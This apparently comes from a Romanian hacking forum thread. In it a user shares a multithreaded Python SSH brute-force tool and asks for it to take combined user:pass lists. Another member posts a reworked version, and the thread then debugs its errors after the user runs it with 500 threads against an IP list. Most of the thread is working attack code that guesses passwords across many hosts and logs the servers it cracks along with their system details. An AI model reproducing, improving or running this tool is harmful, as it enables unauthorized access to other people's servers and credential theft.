Jump to content
kmkozeu

Cerere

Recommended Posts

Salut rst, am vazut o sursa de ssh bruteforce in python mai exact a lui @Elohim  sursa ia usererele dintr-un fisier diferit si parolele din alt fisier is curios daca poate cineva sa o modifice sa ia din acelasi fisier mai exact ex: pass.txt in fisier sa fie " user:pass " sau "user pass " aveti sursa mai jos, thx

import paramiko, sys, Queue, threading

class SSHBrute(threading.Thread): 
	def __init__(self, queue):
		threading.Thread.__init__(self)
		self.queue = queue		
	def run(self):
		while True:
			ip,user,passwd = self.queue.get()
			self.kraken(ip,user,passwd)
			self.queue.task_done()

	def kraken(self,ip,user,passwd):
		try:
			if ip in cracked: return False

			if '%user%' in str(passwd):
				passwd = passwd.split("%")[0] + user + passwd.split("%")[2]
			if '%User%' in str(passwd):
				pwd = user + passwd.split("%")[2]
				passwd = passwd.split("%")[0]+pwd.title()
			if str(passwd) == '%null%':
				passwd = ''

			ssh = paramiko.SSHClient()
			ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
			ssh.connect(ip, username=user, password=passwd, timeout=35)
			raw.write(ip+' '+user+' '+passwd+'\n')
			raw.flush()
			chan = ssh.get_transport().open_session()
			chan.settimeout(35)
			chan.exec_command('uname -a')
			data = chan.recv(1024)

			if len(data) == 0:
				nologs.write(ip+' '+user+' '+passwd+'\n')
				nologs.flush()
				return False

			val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n')
			val.flush()
			cracked.append(ip)
			chan.close()
			ssh.close()
			return True
		except Exception, e:
			if 'uthent' in str(e):
				if dbg == 'bad':
					bad.write(ip+'\n')
					bad.flush()
				#print '\r[+]Tried '+ip+' '+user+' '+passwd+' 				'
				ssh.close()
				return False
			#print ip, str(e)
			ssh.close()
			return False

def brutemain():
	if len(sys.argv) < 2:
		print """
	SSH Brute Force Tool
	Author: @Elohim [RST]
	Usage:
	   bruter ThreadNumber IpFile UserFile PassFile FilterSwitch*	
	  *The filter Switch Takes Either the word "bad" or "no".
	   If you supply the word bad, it filters in bad.txt only the ips 
	   which indeed support ssh AUTH and password didn't work"""
		return False
	ThreadNR = int(sys.argv[1])
	queue = Queue.Queue(maxsize=20000)
	try:
		i = 0
		for i in range(ThreadNR):
			t = SSHBrute(queue)
			t.daemon = True
			t.start()
			i += 1
	except Exception, e:
		print 'Cant start more than',i,'Threads!'

	global bad
	global val
	global nologs
	global cracked
	global raw
	cracked = []
	bad = open('bad.txt','w')
	val = open('valid.txt','a')
	nologs = open('nologins.txt','a')
	raw = open('raw.txt','a')
	with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines()
	with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines()
	with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines()
	global dbg
	dbg = str(sys.argv[5])

	try:
		for password in passwords:
			for user in users:
				for ip in ips:
					queue.put((ip,user,password))
	except:
		pass

	queue.join()

if __name__ == "__main__":
	brutemain()
Link to comment
Share on other sites

  • Active Members
import Queue
import paramiko
import sys
import threading


class SSHBrute(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            ip, user, passwd = self.queue.get()
            self.kraken(ip, user, passwd)
            self.queue.task_done()

    def kraken(self, ip, user, passwd):
        cracked = []
        bad = open('bad.txt', 'w')
        val = open('valid.txt', 'a')
        nologs = open('nologins.txt', 'a')
        raw = open('raw.txt', 'a')
        dbg = str(sys.argv[4])

        try:
            if ip in cracked:
                return False

            if '%user%' in str(passwd):
                passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2])

            if '%User%' in str(passwd):
                pwd = '{}{}'.format(user, passwd.split("%")[2])
                passwd = '{}{}'.format(passwd.split("%")[0], pwd.title())

            if str(passwd) == '%null%':
                passwd = ''

            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(ip, username=user, password=passwd, timeout=35)
            raw.write(ip + ' ' + user + ' ' + passwd + '\n')
            raw.flush()
            chan = ssh.get_transport().open_session()
            chan.settimeout(35)
            chan.exec_command('uname -a')
            data = chan.recv(1024)

            if len(data) == 0:
                nologs.write('{} {} {}\n'.format(ip, user, passwd))
                nologs.flush()
                return False

            val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip()))
            val.flush()
            cracked.append(ip)
            chan.close()
            ssh.close()

            return True
        except Exception as e:
            if 'uthent' in str(e):
                if dbg == 'bad':
                    bad.write(ip + '\n')
                    bad.flush()
                ssh.close()
                return False
            ssh.close()
            return False


def brutemain():
    if len(sys.argv) < 2:
        return False

    ThreadNR = int(sys.argv[1])
    queue = Queue.Queue(maxsize=20000)
    try:
        i = 0

        for i in range(ThreadNR):
            t = SSHBrute(queue)
            t.daemon = True
            t.start()
            i += 1
    except Exception as e:
        print('Cant start more than {} threads because: {}.'.format(i, e))

    with open(str(sys.argv[2]), 'rU') as ipf:
        ips = ipf.read().splitlines()
    with open(str(sys.argv[3]), 'rU') as uf:
        users_and_passwds = uf.read().splitlines()

    try:
        for user_and_pass in users_and_passwds:
            for ip in ips:
                queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip()))
    except Exception as e:
        print('Exception raised: {}'.format(e))
        pass

    queue.join()


if __name__ == "__main__":
    brutemain()

 

Link to comment
Share on other sites

5 hours ago, MrGrj said:

import Queue
import paramiko
import sys
import threading


class SSHBrute(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            ip, user, passwd = self.queue.get()
            self.kraken(ip, user, passwd)
            self.queue.task_done()

    def kraken(self, ip, user, passwd):
        cracked = []
        bad = open('bad.txt', 'w')
        val = open('valid.txt', 'a')
        nologs = open('nologins.txt', 'a')
        raw = open('raw.txt', 'a')
        dbg = str(sys.argv[4])

        try:
            if ip in cracked:
                return False

            if '%user%' in str(passwd):
                passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2])

            if '%User%' in str(passwd):
                pwd = '{}{}'.format(user, passwd.split("%")[2])
                passwd = '{}{}'.format(passwd.split("%")[0], pwd.title())

            if str(passwd) == '%null%':
                passwd = ''

            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(ip, username=user, password=passwd, timeout=35)
            raw.write(ip + ' ' + user + ' ' + passwd + '\n')
            raw.flush()
            chan = ssh.get_transport().open_session()
            chan.settimeout(35)
            chan.exec_command('uname -a')
            data = chan.recv(1024)

            if len(data) == 0:
                nologs.write('{} {} {}\n'.format(ip, user, passwd))
                nologs.flush()
                return False

            val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip()))
            val.flush()
            cracked.append(ip)
            chan.close()
            ssh.close()

            return True
        except Exception as e:
            if 'uthent' in str(e):
                if dbg == 'bad':
                    bad.write(ip + '\n')
                    bad.flush()
                ssh.close()
                return False
            ssh.close()
            return False


def brutemain():
    if len(sys.argv) < 2:
        return False

    ThreadNR = int(sys.argv[1])
    queue = Queue.Queue(maxsize=20000)
    try:
        i = 0

        for i in range(ThreadNR):
            t = SSHBrute(queue)
            t.daemon = True
            t.start()
            i += 1
    except Exception as e:
        print('Cant start more than {} threads because: {}.'.format(i, e))

    with open(str(sys.argv[2]), 'rU') as ipf:
        ips = ipf.read().splitlines()
    with open(str(sys.argv[3]), 'rU') as uf:
        users_and_passwds = uf.read().splitlines()

    try:
        for user_and_pass in users_and_passwds:
            for ip in ips:
                queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip()))
    except Exception as e:
        print('Exception raised: {}'.format(e))
        pass

    queue.join()


if __name__ == "__main__":
    brutemain()

 

File "t.py", line 16
    self.queue.task_done()?
                          ^
SyntaxError: invalid syntax
 

Link to comment
Share on other sites

6 hours ago, MrGrj said:

import Queue
import paramiko
import sys
import threading


class SSHBrute(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            ip, user, passwd = self.queue.get()
            self.kraken(ip, user, passwd)
            self.queue.task_done()

    def kraken(self, ip, user, passwd):
        cracked = []
        bad = open('bad.txt', 'w')
        val = open('valid.txt', 'a')
        nologs = open('nologins.txt', 'a')
        raw = open('raw.txt', 'a')
        dbg = str(sys.argv[4])

        try:
            if ip in cracked:
                return False

            if '%user%' in str(passwd):
                passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2])

            if '%User%' in str(passwd):
                pwd = '{}{}'.format(user, passwd.split("%")[2])
                passwd = '{}{}'.format(passwd.split("%")[0], pwd.title())

            if str(passwd) == '%null%':
                passwd = ''

            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(ip, username=user, password=passwd, timeout=35)
            raw.write(ip + ' ' + user + ' ' + passwd + '\n')
            raw.flush()
            chan = ssh.get_transport().open_session()
            chan.settimeout(35)
            chan.exec_command('uname -a')
            data = chan.recv(1024)

            if len(data) == 0:
                nologs.write('{} {} {}\n'.format(ip, user, passwd))
                nologs.flush()
                return False

            val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip()))
            val.flush()
            cracked.append(ip)
            chan.close()
            ssh.close()

            return True
        except Exception as e:
            if 'uthent' in str(e):
                if dbg == 'bad':
                    bad.write(ip + '\n')
                    bad.flush()
                ssh.close()
                return False
            ssh.close()
            return False


def brutemain():
    if len(sys.argv) < 2:
        return False

    ThreadNR = int(sys.argv[1])
    queue = Queue.Queue(maxsize=20000)
    try:
        i = 0

        for i in range(ThreadNR):
            t = SSHBrute(queue)
            t.daemon = True
            t.start()
            i += 1
    except Exception as e:
        print('Cant start more than {} threads because: {}.'.format(i, e))

    with open(str(sys.argv[2]), 'rU') as ipf:
        ips = ipf.read().splitlines()
    with open(str(sys.argv[3]), 'rU') as uf:
        users_and_passwds = uf.read().splitlines()

    try:
        for user_and_pass in users_and_passwds:
            for ip in ips:
                queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip()))
    except Exception as e:
        print('Exception raised: {}'.format(e))
        pass

    queue.join()


if __name__ == "__main__":
    brutemain()

 

am rezolvat problema de mai sus, erau pusi ? la sfarsit la 2 linii, acum am alta problema mai exact eroarea asta 

cate thread-uri pun de atatea ori o da. 

root@mail:/home/administrator# python t.py 500 ips pass
Exception in thread Thread-26:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 810, in __bootstrap_inner
    self.run()
  File "t.py", line 15, in run
    self.kraken(ip, user, passwd)
  File "t.py", line 24, in kraken
    dbg = str(sys.argv[4])
IndexError: list index out of range

si asta 

No handlers could be found for logger "paramiko.transport"
 

Edited by kmkozeu
Link to comment
Share on other sites

  • Active Members
On 2/16/2019 at 8:55 PM, kmkozeu said:

File "t.py", line 24, in kraken
    dbg = str(sys.argv[4])

Trebuie sa mai pui un argument la sfarsitul comenzii:

 

python t.py 500 ips pass bad
# adauga asta            ^^^

 

On 2/16/2019 at 8:55 PM, kmkozeu said:

No handlers could be found for logger "paramiko.transport"

Trebuie sa adaugi asta:

paramiko.util.log_to_file("filename.log")

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...